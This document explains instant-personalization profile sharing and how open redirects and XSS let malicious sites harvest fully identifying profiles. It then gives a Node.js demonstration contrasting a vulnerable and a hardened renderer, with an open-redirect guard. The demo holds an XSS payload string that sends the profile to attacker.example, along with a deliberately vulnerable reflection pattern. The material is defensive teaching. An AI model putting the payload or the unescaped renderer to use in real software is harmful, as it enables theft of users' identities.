Instant personalization is a feature that personalizes a user's experience the moment the user visits a third-party app or website, by carrying the user's profile from the platform to that app or website. The profile may include the user's name, profile picture, gender, networks, friend list, and any other information the user has made available. The third-party website can then present the user a personalized webpage and/or application based on that profile.
For example, when a specific user visits a movie review site while logged into a social networking site, the social networking site may share that user's profile with the movie review site in the background, without the user noticing. Based on the profile, the movie review site can provide the user a personalized experience, such as a greeting by name, a view of movies that the user's friends have rated or reviewed, and recommendations based on movies the user has previously "liked."
However, security abuses (e.g., open redirects and XSS attacks) have become a concern for platforms facilitating instant personalization. A particular class of abuses involves platforms providing third-party applications with users' fully identifying profiles. Here, fully identifying profiles refer to profile information that unambiguously identifies specific individuals. Profiles that include a user's full name along with gender and networks often unambiguously identify individuals. Similarly, profiles that include IDs that can be used to look up a user's full name, gender, and networks can in turn be used to unambiguously identify individuals.
Malicious apps and websites can redirect visitors to third-party software (e.g., applications and websites/webpages) that integrates with instant personalization platforms providing fully identifying profiles. These redirects can happen in background browser windows, or quickly enough that the visitor does not notice. Upon redirect, the platform provides the third-party software with a fully identifying profile for the visitor. The malicious app or website can then exploit any open redirect or XSS vulnerability in the third-party application or website to retrieve the visitor's fully identifying profile; with XSS, for instance, injected script running in the third-party page can read the profile the platform placed there and send it to a server the attacker controls. The profile can in turn be used to blackmail users who have visited compromising malicious apps and websites. In general, platforms facilitating instant personalization through fully identifying profiles are subject to a range of such attacks.
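The following is an added example, not code from the original text or from any platform it describes. It simulates, in Node.js, the attack chain above on a hypothetical third-party movie review page: the page embeds a constructed sample profile (standing in for what a personalization platform would hand over) and also reflects a search term from the URL. A vulnerable renderer reflects the term verbatim, so a malicious referrer's injected script lands in the page that holds the profile and can exfiltrate it; a hardened renderer escapes every untrusted value for its context. An open-redirect guard is included as the companion fix for the other abuse the text names. Execution of the injected script is not simulated; the example checks the rendered HTML instead. All hostnames (reviews.example, attacker.example) and the profile data are invented for illustration.

```javascript
'use strict';

// Constructed sample profile: hypothetical data standing in for the fully
// identifying profile a personalization platform would provide to the site.
const SAMPLE_PROFILE = {
  id: '1000000000001',
  name: 'Jane Example',
  gender: 'female',
  networks: ['Example University'],
};

// Payload a malicious referring page could smuggle in via the reflected
// parameter: it reads the embedded profile and ships it to an attacker host
// (hypothetical hostname). Using an Image request avoids any CORS preflight.
const ATTACK_PAYLOAD =
  '<script>new Image().src="https://attacker.example/c?p="+' +
  'encodeURIComponent(JSON.stringify(window.profile))</script>';

// Escape untrusted text for placement in HTML element content or attributes.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Serialize data for an inline <script> so a string value containing
// "</script>" or "<!--" cannot terminate the script block early.
function jsonForScript(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e');
}

// VULNERABLE renderer: the search term is reflected verbatim, so a <script>
// inside it runs in the origin of the page that holds window.profile.
function renderVulnerable(searchTerm, profile) {
  return [
    '<html><body>',
    `<script>window.profile = ${JSON.stringify(profile)};</script>`,
    `<h1>Hello, ${profile.name}. Results for: ${searchTerm}</h1>`,
    '</body></html>',
  ].join('\n');
}

// HARDENED renderer: each untrusted value is escaped for the context it lands in
// (HTML text for the name and search term, JS literal for the profile bootstrap).
function renderHardened(searchTerm, profile) {
  return [
    '<html><body>',
    `<script>window.profile = ${jsonForScript(profile)};</script>`,
    `<h1>Hello, ${escapeHtml(profile.name)}. Results for: ${escapeHtml(searchTerm)}</h1>`,
    '</body></html>',
  ].join('\n');
}

// Count <script> elements in a rendered page. The site's own profile bootstrap
// accounts for exactly one; any further tag came from injected input.
function countScriptTags(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// Open-redirect guard: follow a "next" target only if it resolves to the site's
// own origin. Absolute off-site URLs, protocol-relative forms such as
// "//attacker.example/x", and non-http schemes are replaced with the site root.
function safeRedirectTarget(next, siteOrigin) {
  let resolved;
  try {
    resolved = new URL(next, siteOrigin);
  } catch (e) {
    return siteOrigin + '/';
  }
  if (resolved.origin !== siteOrigin) return siteOrigin + '/';
  return resolved.href;
}

// Stand-alone demonstration of both renderers and the redirect guard.
console.log('vulnerable page <script> count:',
  countScriptTags(renderVulnerable(ATTACK_PAYLOAD, SAMPLE_PROFILE)));
console.log('hardened page <script> count:',
  countScriptTags(renderHardened(ATTACK_PAYLOAD, SAMPLE_PROFILE)));
console.log('redirect of //attacker.example/steal ->',
  safeRedirectTarget('//attacker.example/steal', 'https://reviews.example'));
```

The script count is the observable difference between the two renderers: the vulnerable page carries the site's bootstrap plus the attacker's injected script, while the hardened page carries only the bootstrap because the reflected term arrives as `&lt;script&gt;`. The redirect guard compares the resolved origin rather than the string prefix, which is what defeats `//attacker.example/...` and `https://reviews.example.attacker.example/` style targets.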